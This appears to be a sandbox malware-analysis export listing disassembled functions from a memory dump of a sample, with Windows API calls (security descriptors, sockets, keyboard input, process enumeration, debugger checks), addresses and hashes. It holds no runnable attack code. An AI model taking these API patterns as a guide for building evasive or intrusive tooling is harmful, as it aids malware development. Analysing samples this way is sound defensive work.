                                                                                        • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                                        • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                        • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                                        APIs
                                                                                          • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                                          • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                                          • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                                          • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                                        • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                        • String ID:
                                                                                        • API String ID: 1255039815-0
                                                                                        • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                        • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                                        • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                        • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                                        APIs
                                                                                        • __swprintf.LIBCMT ref: 00433073
                                                                                        • __swprintf.LIBCMT ref: 00433085
                                                                                        • __wcsicoll.LIBCMT ref: 00433092
                                                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                                        • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                                        • LockResource.KERNEL32(?), ref: 00433120
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                                        • String ID:
                                                                                        • API String ID: 1158019794-0
                                                                                        • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                        • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                                        • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                        • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1737998785-0
                                                                                        • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                        • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                                        • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                        • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                                        • GetLastError.KERNEL32 ref: 0045D6BF
                                                                                        • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                        • API String ID: 4194297153-14809454
                                                                                        • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                        • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                                        • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                        • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove$_strncmp
                                                                                        • String ID: @oH$\$^$h
                                                                                        • API String ID: 2175499884-3701065813
                                                                                        • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                        • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                                        • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                        • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                                        APIs
                                                                                        • socket.WSOCK32(00000002,00000001,00000006), ref: 0046530D
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                                        • closesocket.WSOCK32(00000000), ref: 00465377
                                                                                        • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                                        • closesocket.WSOCK32(00000000), ref: 004653BD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                        • String ID:
                                                                                        • API String ID: 540024437-0
                                                                                        • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                        • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                                        • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                        • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                                        • API String ID: 0-2872873767
                                                                                        • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                        • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                                        • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                        • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                                        • __wsplitpath.LIBCMT ref: 00475644
                                                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                        • _wcscat.LIBCMT ref: 00475657
                                                                                        • __wcsicoll.LIBCMT ref: 0047567B
                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                        • String ID:
                                                                                        • API String ID: 2547909840-0
                                                                                        • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                        • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                                        • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                        • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                                        APIs
                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                                        • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                                        • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                                        • FindClose.KERNEL32(?), ref: 004525FF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                                        • String ID: *.*$\VH
                                                                                        • API String ID: 2786137511-2657498754
                                                                                        • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                        • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                                        • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                        • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                                        APIs
                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                                        • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                        • String ID: pqI
                                                                                        • API String ID: 2579439406-2459173057
                                                                                        • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                        • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                                        • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                        • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                                        APIs
                                                                                        • __wcsicoll.LIBCMT ref: 00433349
                                                                                        • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                                        • __wcsicoll.LIBCMT ref: 00433375
                                                                                        • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsicollmouse_event
                                                                                        • String ID: DOWN
                                                                                        • API String ID: 1033544147-711622031
                                                                                        • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                        • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                                        • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                        • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                                        • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                                        • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                                        • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: KeyboardMessagePostState$InputSend
                                                                                        • String ID:
                                                                                        • API String ID: 3031425849-0
                                                                                        • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                        • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                                        • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                        • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                                        APIs
                                                                                          • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 0047666F
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastinet_addrsocket
                                                                                        • String ID:
                                                                                        • API String ID: 4170576061-0
                                                                                        • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                        • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                                        • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                        • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                                        APIs
                                                                                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                        • IsWindowVisible.USER32 ref: 0047A368
                                                                                        • IsWindowEnabled.USER32 ref: 0047A378
                                                                                        • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                                        • IsIconic.USER32 ref: 0047A393
                                                                                        • IsZoomed.USER32 ref: 0047A3A1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
